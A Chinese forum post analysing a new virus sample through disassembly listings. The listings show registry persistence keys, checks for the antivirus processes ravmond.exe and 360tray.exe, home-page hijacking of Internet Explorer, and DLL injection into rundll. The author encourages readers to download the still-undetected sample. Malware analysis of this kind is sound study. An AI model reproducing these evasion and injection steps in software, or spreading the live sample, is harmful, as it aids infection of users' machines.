这病毒样本是早两天得到的。刚刚在线杀毒,国内的杀毒软件都还未定义。看到贴的不仿下下来看看你的杀毒软件可以查杀吗!感谢昨天打击我的人(自己),昨晚搞到12点写出
来的文章,以曾加自信心用。由于是最新病毒,所以贴出来。晚点下载就会被杀毒软件加到特征库去了。本人QQ:591841426(学习交流之用,求破者勿扰)
嫌话少说!开始。
得到的这个样本未加壳,长度为“256,144”字节,该样本使用“VC++”编写
MD5值:F5E39FD21E72F15A966F90AA35725B87
1、先来看看病毒主体
代码:
00401660 >/$ 55 PUSH EBP //载入停在这里 00401661 |. 8BEC MOV EBP,ESP 00401663 |. 6A FF PUSH -1 00401665 |. 68 A8524000 PUSH 复件_123.004052A8 0040166A |. 68 5A164000 PUSH <JMP.&MSVCRT._except_handler3> ; SE 处理程序安装 0040166F |. 64:A1 0000000>MOV EAX,DWORD PTR FS:[0] 00401675 |. 50 PUSH EAX 00401676 |. 64:8925 00000>MOV DWORD PTR FS:[0],ESP 0040167D |. 83EC 68 SUB ESP,68 00401680 |. 53 PUSH EBX 00401681 |. 56 PUSH ESI 00401682 |. 57 PUSH EDI 00401683 |. 8965 E8 MOV DWORD PTR SS:[EBP-18],ESP 00401686 |. 33DB XOR EBX,EBX 00401688 |. 895D FC MOV DWORD PTR SS:[EBP-4],EBX 0040168B |. 6A 02 PUSH 2 0040168D |. FF15 50514000 CALL DWORD PTR DS:[<&MSVCRT.__set_app_ty>; msvcrt.__set_app_type 00401693 |. 59 POP ECX 00401694 |. 830D 10E64300>OR DWORD PTR DS:[43E610],FFFFFFFF 0040169B |. 830D 14E64300>OR DWORD PTR DS:[43E614],FFFFFFFF 004016A2 |. FF15 54514000 CALL DWORD PTR DS:[<&MSVCRT.__p__fmode>] ; msvcrt.__p__fmode 004016A8 |. 8B0D 04E64300 MOV ECX,DWORD PTR DS:[43E604] 004016AE |. 8908 MOV DWORD PTR DS:[EAX],ECX 004016B0 |. FF15 58514000 CALL DWORD PTR DS:[<&MSVCRT.__p__commode>; msvcrt.__p__commode 004016B6 |. 8B0D 00E64300 MOV ECX,DWORD PTR DS:[43E600] 004016BC |. 8908 MOV DWORD PTR DS:[EAX],ECX 004016BE |. A1 5C514000 MOV EAX,DWORD PTR DS:[<&MSVCRT._adjust_f> 004016C3 |. 8B00 MOV EAX,DWORD PTR DS:[EAX] 004016C5 |. A3 0CE64300 MOV DWORD PTR DS:[43E60C],EAX 004016CA |. E8 16010000 CALL 复件_123.004017E5 004016CF |. 391D 10E44300 CMP DWORD PTR DS:[43E410],EBX 004016D5 |. 75 0C JNZ SHORT 复件_123.004016E3 004016D7 |. 68 E2174000 PUSH 复件_123.004017E2 004016DC |. FF15 60514000 CALL DWORD PTR DS:[<&MSVCRT.__setusermat>; msvcrt.__setusermatherr 004016E2 |. 59 POP ECX 004016E3 |> E8 E8000000 CALL 复件_123.004017D0 004016E8 |. 68 1C604000 PUSH 复件_123.0040601C 004016ED |. 68 18604000 PUSH 复件_123.00406018 004016F2 |. E8 D3000000 CALL <JMP.&MSVCRT._initterm> 004016F7 |. A1 FCE54300 MOV EAX,DWORD PTR DS:[43E5FC] 004016FC |. 8945 94 MOV DWORD PTR SS:[EBP-6C],EAX 004016FF |. 8D45 94 LEA EAX,DWORD PTR SS:[EBP-6C] 00401702 |. 50 PUSH EAX 00401703 |. FF35 F8E54300 PUSH DWORD PTR DS:[43E5F8] 00401709 |. 8D45 9C LEA EAX,DWORD PTR SS:[EBP-64] 0040170C |. 50 PUSH EAX 0040170D |. 8D45 90 LEA EAX,DWORD PTR SS:[EBP-70] 00401710 |. 50 PUSH EAX 00401711 |. 8D45 A0 LEA EAX,DWORD PTR SS:[EBP-60] 00401714 |. 50 PUSH EAX 00401715 |. FF15 68514000 CALL DWORD PTR DS:[<&MSVCRT.__getmainarg>; msvcrt.__getmainargs 0040171B |. 68 14604000 PUSH 复件_123.00406014 00401720 |. 68 00604000 PUSH 复件_123.00406000 00401725 |. E8 A0000000 CALL <JMP.&MSVCRT._initterm> 0040172A |. 83C4 24 ADD ESP,24 0040172D |. A1 6C514000 MOV EAX,DWORD PTR DS:[<&MSVCRT._acmdln>] 00401732 |. 8B30 MOV ESI,DWORD PTR DS:[EAX] 00401734 |. 8975 8C MOV DWORD PTR SS:[EBP-74],ESI 00401737 |. 803E 22 CMP BYTE PTR DS:[ESI],22 0040173A |. 75 3A JNZ SHORT 复件_123.00401776 0040173C |> 46 /INC ESI //从这里开始是获取自身目录 0040173D |. 8975 8C |MOV DWORD PTR SS:[EBP-74],ESI 00401740 |. 8A06 |MOV AL,BYTE PTR DS:[ESI] 00401742 |. 3AC3 |CMP AL,BL 00401744 |. 74 04 |JE SHORT 复件_123.0040174A 00401746 |. 3C 22 |CMP AL,22 00401748 |.^ 75 F2 \JNZ SHORT 复件_123.0040173C //循环到此结束 0040174A |> 803E 22 CMP BYTE PTR DS:[ESI],22 0040174D |. 75 04 JNZ SHORT 复件_123.00401753 0040174F |> 46 INC ESI 00401750 |. 8975 8C MOV DWORD PTR SS:[EBP-74],ESI 00401753 |> 8A06 MOV AL,BYTE PTR DS:[ESI] 00401755 |. 3AC3 CMP AL,BL 00401757 |. 74 04 JE SHORT 复件_123.0040175D 00401759 |. 3C 20 CMP AL,20 0040175B |.^ 76 F2 JBE SHORT 复件_123.0040174F 0040175D |> 895D D0 MOV DWORD PTR SS:[EBP-30],EBX 00401760 |. 8D45 A4 LEA EAX,DWORD PTR SS:[EBP-5C] 00401763 |. 50 PUSH EAX ; /pStartupinfo 00401764 |. FF15 48504000 CALL DWORD PTR DS:[<&KERNEL32.GetStartup>; \GetStartupInfoA 0040176A |. F645 D0 01 TEST BYTE PTR SS:[EBP-30],1 0040176E |. 74 11 JE SHORT 复件_123.00401781 00401770 |. 0FB745 D4 MOVZX EAX,WORD PTR SS:[EBP-2C] 00401774 |. EB 0E JMP SHORT 复件_123.00401784 00401776 |> 803E 20 /CMP BYTE PTR DS:[ESI],20 00401779 |.^ 76 D8 |JBE SHORT 复件_123.00401753 0040177B |. 46 |INC ESI 0040177C |. 8975 8C |MOV DWORD PTR SS:[EBP-74],ESI 0040177F |.^ EB F5 \JMP SHORT 复件_123.00401776 00401781 |> 6A 0A PUSH 0A 00401783 |. 58 POP EAX 00401784 |> 50 PUSH EAX 00401785 |. 56 PUSH ESI 00401786 |. 53 PUSH EBX 00401787 |. 53 PUSH EBX ; /pModule 00401788 |. FF15 44504000 CALL DWORD PTR DS:[<&KERNEL32.GetModuleH>; \GetModuleHandleA 0040178E |. 50 PUSH EAX 0040178F |. E8 6A000000 CALL 复件_123.004017FE //程序主要的CALL 00401794 |. 8945 98 MOV DWORD PTR SS:[EBP-68],EAX 00401797 |. 50 PUSH EAX ; /status 00401798 |. FF15 70514000 CALL DWORD PTR DS:[<&MSVCRT.exit>] ; \exit 0040179E |. 8B45 EC MOV EAX,DWORD PTR SS:[EBP-14] 004017A1 |. 8B08 MOV ECX,DWORD PTR DS:[EAX] 004017A3 |. 8B09 MOV ECX,DWORD PTR DS:[ECX] 004017A5 |. 894D 88 MOV DWORD PTR SS:[EBP-78],ECX 004017A8 |. 50 PUSH EAX 004017A9 |. 51 PUSH ECX 004017AA |. E8 15000000 CALL <JMP.&MSVCRT._XcptFilter> 004017AF |. 59 POP ECX 004017B0 |. 59 POP ECX 004017B1 \. C3 RETN
代码:
0040443F . B8 5C194000 MOV EAX,复件_123.0040195C 00404444 . E8 A7D1FFFF CALL 复件_123.004015F0 00404449 . 51 PUSH ECX 0040444A . 56 PUSH ESI 0040444B . 8D45 F0 LEA EAX,DWORD PTR SS:[EBP-10] 0040444E . 57 PUSH EDI 0040444F . 50 PUSH EAX 00404450 . E8 93CEFFFF CALL 复件_123.004012E8 00404455 . 59 POP ECX 00404456 . 8365 FC 00 AND DWORD PTR SS:[EBP-4],0 0040445A . 50 PUSH EAX 0040445B . B9 E4E54300 MOV ECX,复件_123.0043E5E4 00404460 . E8 43D1FFFF CALL <JMP.&MFC42.#858_??4CString@@QAEABV> 00404465 . 834D FC FF OR DWORD PTR SS:[EBP-4],FFFFFFFF 00404469 . 8D4D F0 LEA ECX,DWORD PTR SS:[EBP-10] 0040446C . E8 3BD0FFFF CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ> 00404471 . E8 8AEBFFFF CALL 复件_123.00403000 //创建注册表 00404476 . E8 E4EFFFFF CALL 复件_123.0040345F //创建注册表 0040447B . 8B35 54504000 MOV ESI,DWORD PTR DS:[<&KERNEL32.Sleep>] ; kernel32.Sleep 00404481 . BF C8000000 MOV EDI,0C8 00404486 . 57 PUSH EDI ; /Timeout => 200. ms 00404487 . FFD6 CALL ESI ; \Sleep //睡眠200.ms 00404489 . E8 72FBFFFF CALL 复件_123.00404000 //遍历进程查找ravmond.exe 0040448E . 85C0 TEST EAX,EAX 00404490 . 74 0C JE SHORT 复件_123.0040449E 00404492 . E8 1CFEFFFF CALL 复件_123.004042B3 00404497 . E8 75FEFFFF CALL 复件_123.00404311 0040449C . EB 0E JMP SHORT 复件_123.004044AC 0040449E > E8 E6FEFFFF CALL 复件_123.00404389 //遍历进程查找360tray.exe 004044A3 . 85C0 TEST EAX,EAX 004044A5 . 75 05 JNZ SHORT 复件_123.004044AC 004044A7 . E8 2EFDFFFF CALL 复件_123.004041DA //查找IEXPLORE.EXE锁定主页为 http://www.rom12580.cn 004044AC > 57 PUSH EDI 004044AD . FFD6 CALL ESI 004044AF . E8 16ECFFFF CALL 复件_123.004030CA //开始释放文件 004044B4 . E8 58EDFFFF CALL 复件_123.00403211 //创建目录释放文件 004044B9 . A3 ECE54300 MOV DWORD PTR DS:[43E5EC],EAX 004044BE . E8 EEEEFFFF CALL 复件_123.004033B1 //释放iksii.dll文件 004044C3 . 57 PUSH EDI 004044C4 . FFD6 CALL ESI 004044C6 . E8 D6EDFFFF CALL 复件_123.004032A1 //注入到rundll.exe进程,并运行 004044CB . BF E8030000 MOV EDI,3E8 004044D0 . 57 PUSH EDI 004044D1 . FFD6 CALL ESI 004044D3 . E8 9FCBFFFF CALL 复件_123.00401077 //释放病毒体 004044D8 . 57 PUSH EDI 004044D9 . FFD6 CALL ESI 004044DB . E8 C4FBFFFF CALL 复件_123.004040A4 004044E0 . 8B4D F4 MOV ECX,DWORD PTR SS:[EBP-C] 004044E3 . 5F POP EDI 004044E4 . 33C0 XOR EAX,EAX 004044E6 . 5E POP ESI 004044E7 . 64:890D 00000>MOV DWORD PTR FS:[0],ECX 004044EE . C9 LEAVE 004044EF . C3 RETN
代码:
0040141D /$ B8 8C184000 MOV EAX,复件_123.0040188C 00401422 |. E8 C9010000 CALL 复件_123.004015F0 00401427 |. 83EC 0C SUB ESP,0C 0040142A |. 8365 FC 00 AND DWORD PTR SS:[EBP-4],0 0040142E |. 8D4D E8 LEA ECX,DWORD PTR SS:[EBP-18] 00401431 |. E8 C7FCFFFF CALL 复件_123.004010FD 00401436 |. 68 60E04300 PUSH 复件_123.0043E060 ; ASCII "SOFTWARE\Softfy\PlugName" 0040143B |. 68 02000080 PUSH 80000002 00401440 |. 8D4D E8 LEA ECX,DWORD PTR SS:[EBP-18] 00401443 |. C645 FC 01 MOV BYTE PTR SS:[EBP-4],1 00401447 |. E8 4BFDFFFF CALL 复件_123.00401197 //创建注册表项 0040144C |. 85C0 TEST EAX,EAX 0040144E |. 75 20 JNZ SHORT 复件_123.00401470 00401450 |. FF75 08 PUSH DWORD PTR SS:[EBP+8] 00401453 |. 8D4D E8 LEA ECX,DWORD PTR SS:[EBP-18] 00401456 |. 68 54E04300 PUSH 复件_123.0043E054 ; ASCII "LogonName" 0040145B |. E8 BB0B0000 CALL 复件_123.0040201B //设置logonname值 00401460 |. FF75 08 PUSH DWORD PTR SS:[EBP+8] 00401463 |. 8D4D E8 LEA ECX,DWORD PTR SS:[EBP-18] 00401466 |. 68 44E04300 PUSH 复件_123.0043E044 ; ASCII "LogonMainName" 0040146B |. E8 AB0B0000 CALL 复件_123.0040201B //设置LogonMainName 00401470 |> 8D4D E8 LEA ECX,DWORD PTR SS:[EBP-18] 00401473 |. E8 55FDFFFF CALL 复件_123.004011CD //关闭设置 00401478 |. 8065 FC 00 AND BYTE PTR SS:[EBP-4],0 0040147C |. 8D4D E8 LEA ECX,DWORD PTR SS:[EBP-18] 0040147F |. E8 AEFCFFFF CALL 复件_123.00401132 00401484 |. 834D FC FF OR DWORD PTR SS:[EBP-4],FFFFFFFF 00401488 |. 8D4D 08 LEA ECX,DWORD PTR SS:[EBP+8] 0040148B |. E8 1C000000 CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ> 00401490 |. 8B4D F4 MOV ECX,DWORD PTR SS:[EBP-C] 00401493 |. 64:890D 00000>MOV DWORD PTR FS:[0],ECX 0040149A |. C9 LEAVE 0040149B \. C3 RETN
代码:
00401197 /$ 55 PUSH EBP 00401198 |. 8BEC MOV EBP,ESP 0040119A |. 51 PUSH ECX 0040119B |. 56 PUSH ESI ; 复件_123.0043E5E8 0040119C |. 8BF1 MOV ESI,ECX 0040119E |. FF75 0C PUSH DWORD PTR SS:[EBP+C] 004011A1 |. 8D4E 08 LEA ECX,DWORD PTR DS:[ESI+8] 004011A4 |. E8 09030000 CALL <JMP.&MFC42.#860_??4CString@@QAEABV> 004011A9 |. 8D45 FC LEA EAX,DWORD PTR SS:[EBP-4] 004011AC |. 83C6 04 ADD ESI,4 004011AF |. 50 PUSH EAX ; /pDisposition 004011B0 |. 33C0 XOR EAX,EAX ; | 004011B2 |. 56 PUSH ESI ; |pHandle 004011B3 |. 50 PUSH EAX ; |pSecurity => NULL 004011B4 |. 68 3F000F00 PUSH 0F003F ; |Access = KEY_ALL_ACCESS 004011B9 |. 50 PUSH EAX ; |Options => REG_OPTION_NON_VOLATILE 004011BA |. 50 PUSH EAX ; |Class => NULL 004011BB |. 50 PUSH EAX ; |Reserved => 0 004011BC |. FF75 0C PUSH DWORD PTR SS:[EBP+C] ; |Subkey 004011BF |. FF75 08 PUSH DWORD PTR SS:[EBP+8] ; |hKey 004011C2 |. FF15 08504000 CALL DWORD PTR DS:[<&ADVAPI32.RegCreateK>; \RegCreateKeyExA 004011C8 |. 5E POP ESI 004011C9 |. C9 LEAVE 004011CA \. C2 0800 RETN 8
代码:
0040345F /$ B8 F8184000 MOV EAX,复件_123.004018F8 00403464 |. E8 87E1FFFF CALL 复件_123.004015F0 00403469 |. 83EC 30 SUB ESP,30 0040346C |. 53 PUSH EBX 0040346D |. 56 PUSH ESI 0040346E |. 8D4D C4 LEA ECX,DWORD PTR SS:[EBP-3C] 00403471 |. E8 4AE1FFFF CALL <JMP.&MFC42.#354_??0CFile@@QAE@XZ> 00403476 |. 33DB XOR EBX,EBX 00403478 |. 8D4D E0 LEA ECX,DWORD PTR SS:[EBP-20] 0040347B |. 895D FC MOV DWORD PTR SS:[EBP-4],EBX 0040347E |. E8 1DE0FFFF CALL <JMP.&MFC42.#540_??0CString@@QAE@XZ> 00403483 |. 8D4D E4 LEA ECX,DWORD PTR SS:[EBP-1C] 00403486 |. C645 FC 01 MOV BYTE PTR SS:[EBP-4],1 0040348A |. E8 11E0FFFF CALL <JMP.&MFC42.#540_??0CString@@QAE@XZ> 0040348F |. 8D4D E8 LEA ECX,DWORD PTR SS:[EBP-18] 00403492 |. C645 FC 02 MOV BYTE PTR SS:[EBP-4],2 00403496 |. E8 05E0FFFF CALL <JMP.&MFC42.#540_??0CString@@QAE@XZ> 0040349B |. 8D4D EC LEA ECX,DWORD PTR SS:[EBP-14] 0040349E |. C645 FC 03 MOV BYTE PTR SS:[EBP-4],3 004034A2 |. E8 F9DFFFFF CALL <JMP.&MFC42.#540_??0CString@@QAE@XZ> 004034A7 |. 68 6CE24300 PUSH 复件_123.0043E26C ; ASCII "full80" 004034AC |. 8D4D E4 LEA ECX,DWORD PTR SS:[EBP-1C] 004034AF |. C645 FC 04 MOV BYTE PTR SS:[EBP-4],4 004034B3 |. E8 FADFFFFF CALL <JMP.&MFC42.#860_??4CString@@QAEABV> 004034B8 |. 68 68E24300 PUSH 复件_123.0043E268 ; ASCII "C2" 004034BD |. 8D4D E8 LEA ECX,DWORD PTR SS:[EBP-18] 004034C0 |. E8 EDDFFFFF CALL <JMP.&MFC42.#860_??4CString@@QAEABV> 004034C5 |. 68 60E24300 PUSH 复件_123.0043E260 ; ASCII "1.0.1" 004034CA |. 8D4D EC LEA ECX,DWORD PTR SS:[EBP-14] 004034CD |. E8 E0DFFFFF CALL <JMP.&MFC42.#860_??4CString@@QAEABV> 004034D2 |. 8D4D D4 LEA ECX,DWORD PTR SS:[EBP-2C] 004034D5 |. E8 23DCFFFF CALL 复件_123.004010FD 004034DA |. 8D4D F0 LEA ECX,DWORD PTR SS:[EBP-10] 004034DD |. C645 FC 05 MOV BYTE PTR SS:[EBP-4],5 004034E1 |. E8 BADFFFFF CALL <JMP.&MFC42.#540_??0CString@@QAE@XZ> 004034E6 |. 68 44E24300 PUSH 复件_123.0043E244 ; ASCII " SOFTWARE\Softfy\Plug" 004034EB |. 8D4D F0 LEA ECX,DWORD PTR SS:[EBP-10] 004034EE |. C645 FC 06 MOV BYTE PTR SS:[EBP-4],6 004034F2 |. E8 BBDFFFFF CALL <JMP.&MFC42.#860_??4CString@@QAEABV> 004034F7 |. 8D4D F0 LEA ECX,DWORD PTR SS:[EBP-10] 004034FA |. E8 BBE0FFFF CALL <JMP.&MFC42.#6282_?TrimLeft@CString> 004034FF |. 8D4D F0 LEA ECX,DWORD PTR SS:[EBP-10] 00403502 |. E8 ADE0FFFF CALL <JMP.&MFC42.#6283_?TrimRight@CStrin> 00403507 |. FF75 F0 PUSH DWORD PTR SS:[EBP-10] 0040350A |. BE 02000080 MOV ESI,80000002 0040350F |. 8D4D D4 LEA ECX,DWORD PTR SS:[EBP-2C] 00403512 |. 56 PUSH ESI 00403513 |. E8 7FDCFFFF CALL 复件_123.00401197 //创建注册表键值 00403518 |. 85C0 TEST EAX,EAX 0040351A |. 75 7B JNZ SHORT 复件_123.00403597 0040351C |. FF75 E4 PUSH DWORD PTR SS:[EBP-1C] 0040351F |. 8D4D D4 LEA ECX,DWORD PTR SS:[EBP-2C] 00403522 |. 68 34E24300 PUSH 复件_123.0043E234 ; ASCII "PlugUserName" 00403527 |. E8 EFEAFFFF CALL 复件_123.0040201B //设置注册表键值 0040352C |. FF75 E8 PUSH DWORD PTR SS:[EBP-18] 0040352F |. 8D4D D4 LEA ECX,DWORD PTR SS:[EBP-2C] 00403532 |. 68 24E24300 PUSH 复件_123.0043E224 ; ASCII "PlugSoftName" 00403537 |. E8 DFEAFFFF CALL 复件_123.0040201B //设置注册表键值 0040353C |. FF75 EC PUSH DWORD PTR SS:[EBP-14] 0040353F |. 8D4D D4 LEA ECX,DWORD PTR SS:[EBP-2C] 00403542 |. 68 18E24300 PUSH 复件_123.0043E218 ; ASCII "PlugSoftVer" 00403547 |. E8 CFEAFFFF CALL 复件_123.0040201B //设置注册表键值 0040354C |. 53 PUSH EBX 0040354D |. 68 0CE24300 PUSH 复件_123.0043E20C ; ASCII "PlugSendNum" 00403552 |. 8D4D D4 LEA ECX,DWORD PTR SS:[EBP-2C] 00403555 |. E8 A6EAFFFF CALL 复件_123.00402000 ////设置注册表键值 0040355A |. 53 PUSH EBX 0040355B |. 68 00E24300 PUSH 复件_123.0043E200 ; ASCII "PlugStat" 00403560 |. 8D4D D4 LEA ECX,DWORD PTR SS:[EBP-2C] 00403563 |. E8 98EAFFFF CALL 复件_123.00402000 ////设置注册表键值 00403568 |. 68 F8E14300 PUSH 复件_123.0043E1F8 ; ASCII "3.6.7" 0040356D |. 68 ECE14300 PUSH 复件_123.0043E1EC ; ASCII "PlugUpdate" 00403572 |. 8D4D D4 LEA ECX,DWORD PTR SS:[EBP-2C] 00403575 |. E8 A1EAFFFF CALL 复件_123.0040201B ////设置注册表键值 0040357A |. 6A 01 PUSH 1 0040357C |. 68 E4E14300 PUSH 复件_123.0043E1E4 ; ASCII "CoreDll" 00403581 |. 8D4D D4 LEA ECX,DWORD PTR SS:[EBP-2C] 00403584 |. E8 77EAFFFF CALL 复件_123.00402000 ////设置注册表键值 00403589 |. 53 PUSH EBX 0040358A |. 68 D8E14300 PUSH 复件_123.0043E1D8 ; ASCII "LoadNums" 0040358F |. 8D4D D4 LEA ECX,DWORD PTR SS:[EBP-2C] 00403592 |. E8 69EAFFFF CALL 复件_123.00402000 ////设置注册表键值 00403597 |> 57 PUSH EDI 00403598 |. 8D4D D4 LEA ECX,DWORD PTR SS:[EBP-2C] 0040359B |. E8 2DDCFFFF CALL 复件_123.004011CD //关闭注册表 004035A0 |. 68 BCE14300 PUSH 复件_123.0043E1BC ; ASCII "SOFTWARE\Softfy\PlugDown" 004035A5 |. 56 PUSH ESI 004035A6 |. 8D4D D4 LEA ECX,DWORD PTR SS:[EBP-2C] 004035A9 |. E8 E9DBFFFF CALL 复件_123.00401197 //下面都是创建注册表键值,就不多说了。 004035AE |. 85C0 TEST EAX,EAX 004035B0 |. BF B4E14300 MOV EDI,复件_123.0043E1B4 ; ASCII "1.0.0" 004035B5 |. 75 1C JNZ SHORT 复件_123.004035D3 004035B7 |. 57 PUSH EDI 004035B8 |. 68 ACE14300 PUSH 复件_123.0043E1AC ; ASCII "PlugOne" 004035BD |. 8D4D D4 LEA ECX,DWORD PTR SS:[EBP-2C] 004035C0 |. E8 56EAFFFF CALL 复件_123.0040201B 004035C5 |. 57 PUSH EDI 004035C6 |. 68 A4E14300 PUSH 复件_123.0043E1A4 ; ASCII "PlugTwo" 004035CB |. 8D4D D4 LEA ECX,DWORD PTR SS:[EBP-2C] 004035CE |. E8 48EAFFFF CALL 复件_123.0040201B 004035D3 |> 8D4D D4 LEA ECX,DWORD PTR SS:[EBP-2C] 004035D6 |. E8 F2DBFFFF CALL 复件_123.004011CD 004035DB |. 68 8CE14300 PUSH 复件_123.0043E18C ; ASCII "SOFTWARE\Softfy\WebIni" 004035E0 |. 56 PUSH ESI 004035E1 |. 8D4D D4 LEA ECX,DWORD PTR SS:[EBP-2C] 004035E4 |. E8 AEDBFFFF CALL 复件_123.00401197 004035E9 |. 85C0 TEST EAX,EAX 004035EB |. 75 32 JNZ SHORT 复件_123.0040361F 004035ED |. 57 PUSH EDI 004035EE |. 68 80E14300 PUSH 复件_123.0043E180 ; ASCII "WebIniVer" 004035F3 |. 8D4D D4 LEA ECX,DWORD PTR SS:[EBP-2C] 004035F6 |. E8 20EAFFFF CALL 复件_123.0040201B 004035FB |. E8 10010000 CALL 复件_123.00403710 00403600 |. 0FB7C0 MOVZX EAX,AX 00403603 |. 50 PUSH EAX 00403604 |. 68 70E14300 PUSH 复件_123.0043E170 ; ASCII "WebIniSection" 00403609 |. 8D4D D4 LEA ECX,DWORD PTR SS:[EBP-2C] 0040360C |. E8 EFE9FFFF CALL 复件_123.00402000 00403611 |. 53 PUSH EBX 00403612 |. 68 64E14300 PUSH 复件_123.0043E164 ; ASCII "HitProbaby" 00403617 |. 8D4D D4 LEA ECX,DWORD PTR SS:[EBP-2C] 0040361A |. E8 E1E9FFFF CALL 复件_123.00402000 0040361F |> 8D4D D4 LEA ECX,DWORD PTR SS:[EBP-2C] 00403622 |. E8 A6DBFFFF CALL 复件_123.004011CD 00403627 |. 68 48E14300 PUSH 复件_123.0043E148 ; ASCII "SOFTWARE\Softfy\LockPage" 0040362C |. 56 PUSH ESI 0040362D |. 8D4D D4 LEA ECX,DWORD PTR SS:[EBP-2C] 00403630 |. E8 62DBFFFF CALL 复件_123.00401197 00403635 |. 85C0 TEST EAX,EAX 00403637 |. 5F POP EDI 00403638 |. 75 1C JNZ SHORT 复件_123.00403656 0040363A |. 53 PUSH EBX 0040363B |. 68 3CE14300 PUSH 复件_123.0043E13C ; ASCII "LockPageNum" //注册表键值 00403640 |. 8D4D D4 LEA ECX,DWORD PTR SS:[EBP-2C] 00403643 |. E8 B8E9FFFF CALL 复件_123.00402000 00403648 |. 53 PUSH EBX 00403649 |. 68 2CE14300 PUSH 复件_123.0043E12C ; ASCII "NeedLockPage" //注册表键值 0040364E |. 8D4D D4 LEA ECX,DWORD PTR SS:[EBP-2C] 00403651 |. E8 AAE9FFFF CALL 复件_123.00402000 00403656 |> 8D4D D4 LEA ECX,DWORD PTR SS:[EBP-2C] 00403659 |. E8 6FDBFFFF CALL 复件_123.004011CD 0040365E |. 68 14E14300 PUSH 复件_123.0043E114 ; ASCII "SOFTWARE\Softfy\CSID" //注册表项 00403663 |. 56 PUSH ESI 00403664 |. 8D4D D4 LEA ECX,DWORD PTR SS:[EBP-2C] 00403667 |. E8 2BDBFFFF CALL 复件_123.00401197 0040366C |. 85C0 TEST EAX,EAX 0040366E |. 75 37 JNZ SHORT 复件_123.004036A7 00403670 |. 68 ECE04300 PUSH 复件_123.0043E0EC ; ASCII "{C4560D12-CE25-4A2E-A5D4-B5070FCBE282}" 00403675 |. 68 E4E04300 PUSH 复件_123.0043E0E4 ; ASCII "csid" 0040367A |. 8D4D D4 LEA ECX,DWORD PTR SS:[EBP-2C] 0040367D |. E8 99E9FFFF CALL 复件_123.0040201B //创建注册表csid,锁定主页. 00403682 |. FF35 E4E54300 PUSH DWORD PTR DS:[43E5E4] 00403688 |. 8D4D D4 LEA ECX,DWORD PTR SS:[EBP-2C] 0040368B |. 68 DCE04300 PUSH 复件_123.0043E0DC ; ASCII "dllname" 00403690 |. E8 86E9FFFF CALL 复件_123.0040201B 00403695 |. 68 9CE04300 PUSH 复件_123.0043E09C ; ASCII "D:\ssshall" 0040369A |. 68 D4E04300 PUSH 复件_123.0043E0D4 ; ASCII "dllpath" 0040369F |. 8D4D D4 LEA ECX,DWORD PTR SS:[EBP-2C] 004036A2 |. E8 74E9FFFF CALL 复件_123.0040201B 004036A7 |> 8D4D D4 LEA ECX,DWORD PTR SS:[EBP-2C] 004036AA |. E8 1EDBFFFF CALL 复件_123.004011CD //关闭注册表 004036AF |. 8D4D F0 LEA ECX,DWORD PTR SS:[EBP-10] 004036B2 |. C645 FC 05 MOV BYTE PTR SS:[EBP-4],5 004036B6 |. E8 F1DDFFFF CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ> 004036BB |. 8D4D D4 LEA ECX,DWORD PTR SS:[EBP-2C] 004036BE |. C645 FC 04 MOV BYTE PTR SS:[EBP-4],4 004036C2 |. E8 6BDAFFFF CALL 复件_123.00401132 004036C7 |. 8D4D EC LEA ECX,DWORD PTR SS:[EBP-14] 004036CA |. C645 FC 03 MOV BYTE PTR SS:[EBP-4],3 004036CE |. E8 D9DDFFFF CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ> 004036D3 |. 8D4D E8 LEA ECX,DWORD PTR SS:[EBP-18] 004036D6 |. C645 FC 02 MOV BYTE PTR SS:[EBP-4],2 004036DA |. E8 CDDDFFFF CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ> 004036DF |. 8D4D E4 LEA ECX,DWORD PTR SS:[EBP-1C] 004036E2 |. C645 FC 01 MOV BYTE PTR SS:[EBP-4],1 004036E6 |. E8 C1DDFFFF CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ> 004036EB |. 8D4D E0 LEA ECX,DWORD PTR SS:[EBP-20] 004036EE |. 885D FC MOV BYTE PTR SS:[EBP-4],BL 004036F1 |. E8 B6DDFFFF CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ> 004036F6 |. 834D FC FF OR DWORD PTR SS:[EBP-4],FFFFFFFF 004036FA |. 8D4D C4 LEA ECX,DWORD PTR SS:[EBP-3C] 004036FD |. E8 ACDEFFFF CALL <JMP.&MFC42.#665_??1CFile@@UAE@XZ> 00403702 |. 8B4D F4 MOV ECX,DWORD PTR SS:[EBP-C] 00403705 |. 5E POP ESI 00403706 |. 5B POP EBX 00403707 |. 64:890D 00000>MOV DWORD PTR FS:[0],ECX 0040370E |. C9 LEAVE 0040370F \. C3 RETN
代码:
00401197 /$ 55 PUSH EBP 00401198 |. 8BEC MOV EBP,ESP 0040119A |. 51 PUSH ECX 0040119B |. 56 PUSH ESI 0040119C |. 8BF1 MOV ESI,ECX 0040119E |. FF75 0C PUSH DWORD PTR SS:[EBP+C] 004011A1 |. 8D4E 08 LEA ECX,DWORD PTR DS:[ESI+8] 004011A4 |. E8 09030000 CALL <JMP.&MFC42.#860_??4CString@@QAEABV> 004011A9 |. 8D45 FC LEA EAX,DWORD PTR SS:[EBP-4] 004011AC |. 83C6 04 ADD ESI,4 004011AF |. 50 PUSH EAX ; /pDisposition 004011B0 |. 33C0 XOR EAX,EAX ; | 004011B2 |. 56 PUSH ESI ; |pHandle 004011B3 |. 50 PUSH EAX ; |pSecurity => NULL 004011B4 |. 68 3F000F00 PUSH 0F003F ; |Access = KEY_ALL_ACCESS 004011B9 |. 50 PUSH EAX ; |Options => REG_OPTION_NON_VOLATILE 004011BA |. 50 PUSH EAX ; |Class => NULL 004011BB |. 50 PUSH EAX ; |Reserved => 0 004011BC |. FF75 0C PUSH DWORD PTR SS:[EBP+C] ; |Subkey 004011BF |. FF75 08 PUSH DWORD PTR SS:[EBP+8] ; |hKey 004011C2 |. FF15 08504000 CALL DWORD PTR DS:[<&ADVAPI32.RegCreateK>; \RegCreateKeyExA 004011C8 |. 5E POP ESI 004011C9 |. C9 LEAVE 004011CA \. C2 0800 RETN 8
代码:
